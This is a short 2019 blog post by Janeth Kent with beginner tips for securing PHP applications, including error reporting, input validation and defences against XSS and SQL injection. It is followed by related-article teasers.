Tips to Create Secure PHP Applications

by Janeth Kent Date: 29-06-2019 php xss tips sql security injection


PHP is one of the most popular programming languages for the web. Such languages are very helpful for the programmer but the security holes in it can create a problem. They can create problems in the development path.Below are few tips to help you avoid some common PHP security pitfalls and development bug.

1. Use of Proper Error Reporting

Error reporting can be your best friend during the development process. Error reports helps you to find spelling mistakes in your variables and also detect incorrect function usage. Always make sure that you hide all the error reporting once you decide to make the site live.

This can be done by invoking the simple function “error_reporting(0)” at the top of your application file(s).

You should always make sure to log your errors to a protected file. Which help to detect the problem when something go wrong. Therefore, This can be done with the PHP function “set_error_handler”.

2. Disable PHP’s harmful Features

PHP’s creators have always included some features to make PHP development easier. Some of these helpful features can have unintended consequences.
We can call these as “bad features” because they have allowed data validation and created a path for bugs to finding their way into scripts. One of
the first things you should do when the development process begins is
disable certain of these features. Depending on the host which you are using, these may or may not be turned off for you. If you are developing on your own computer or any local environment, they probably won’t be turned off. Some of these features have also been removed in the upcoming PHP6, but are ubiquitous in PHP4 applications and are only deprecated in PHP5 applications.

3. Validate Input

With addition to escaping characters, another good way to protect input is to validate it. Normally you actually know what kind of data you are expecting on input.  So the simplest way to protect yourself against attacks is to make sure your users can only enter the appropriate data.

4. Watch for Cross Site Scripting (XSS) Attacks in User Input

A web application usually accepts input from users and displays it
in some way. They can be in a wide variety of forms. When accepting input, allowing HTML can be a dangerous thing,because that allows for JavaScript to be executed in unintended ways. If even one hole is left open, JavasScript can be executed and cookies could be hijacked. This cookie data could then be used to fake a real account and give an illegal user access to the website’s data. There are a some ways you can protect your site from such attacks. One way is to disallow HTML altogether, because then there is no possible way to allow any JavaScript to execute.

5. Protecting against SQL Injection

SQL injection attacks occur when data is not checked, and the application doesn’t escape characters used in SQL strings such as single quotes (‘) or double quotes (“). If these characters are not filtered out users can disturb the system by making queries always true and which allow them to trick  login systems.

MySQLi help protect your database input. We can do it in 2 ways.

Either with the mysqli_real_escape_string function when connected to a server or with prepared statements.

Prepared statements are a method of separating SQL logic from the data being passed to it. The functions used within the MySQLi library filter the input for us when we bind variables to the prepared statement.

source: http://www.php-developers.org/blog/

 

 
by Janeth Kent Date: 29-06-2019 php xss tips sql security injection hits : 4586  
 
Janeth Kent

Janeth Kent

Licenciada en Bellas Artes y programadora por pasión. Cuando tengo un rato retoco fotos, edito vídeos y diseño cosas. El resto del tiempo escribo en MA-NO WEB DESIGN END DEVELOPMENT.

 
 
 

Related Posts

The ultimate cybersecurity checklist for programmers

In the web programming profession, it is important to take into consideration everything from the essential aspects of cybersecurity to those that are more complex, as it is a profession…

How to Send Email from an HTML Contact Form

In today’s article we will write about how to make a working form that upon hitting that submit button will be functional and send the email (to you as a…

Network attacks and how to avoid them

Nowadays it is impossible to list all the different types of attacks that can be carried out on a network, as in the world of security this varies continuously. We…

6 Best Alternative Privacy Focused Browsers in 2021

In today's article we take a look at free private browsers which are relevant in 2021. We will compare their advantages and disadvantages, specs, etc. Let's get into it. What are alternative…

htaccess Rules to Help Protect from SQL Injections and XSS

This list of rules by no means is a sure bet to secure your web services, but it will help in preventing script-kiddings from doing some basic browsing around. MySQL injection…

Interesting and Helpful Google Search Features You’ll Want to Start Using

Google – THE search engine for many internet users. It has been with us since its launch back in 1998 and thanks to its simplicity of use and genius algorithms,…

The State of PHP 8: new features and changes

PHP 8.0 has been released last November 26: let's discover together the main innovations that the new version introduces in this language. PHP is one of the most popular programming languages…

How to use your browser as a file browser, in Chrome or Microsoft Edge

We're going to explain how to use the Chrome browser as a file browser, both on Android and on your computer. This is a hidden feature of Chromium that will…

Security of Internet providers: can we trust it?

This year has been a time of many changes. Now, more people are connected to the Internet through their home routers for teleworking, shopping, or leisure. This is where the…

Brief History of Biometric Authentication

These days, biometric authentication seems to be part of every little gadget or device we use. You’ve no doubt used it when logging onto your laptop, your tablet, or your…

A beginner’s guide to software vulnerabilities

What are software vulnerabilities The number of devices connected to the Internet is growing every day. And among those devices we find not only computers and smartphones, but also an ever-rising…

The BleedingTooth vulnerability and other Bluetooth security risks

Have you ever heard of BleedingTooth? And we do not mean the really disturbing looking mushroom which goes by this name and is totally real (we double checked) but one of…

We use our own and third-party cookies to improve our services, compile statistical information and analyze your browsing habits. This allows us to personalize the content we offer and to show you advertisements related to your preferences. By clicking "Accept all" you agree to the storage of cookies on your device to improve website navigation, analyse traffic and assist our marketing activities. You can also select "System Cookies Only" to accept only the cookies required for the website to function, or you can select the cookies you wish to activate by clicking on "settings".

Accept All Only sistem cookies Configuration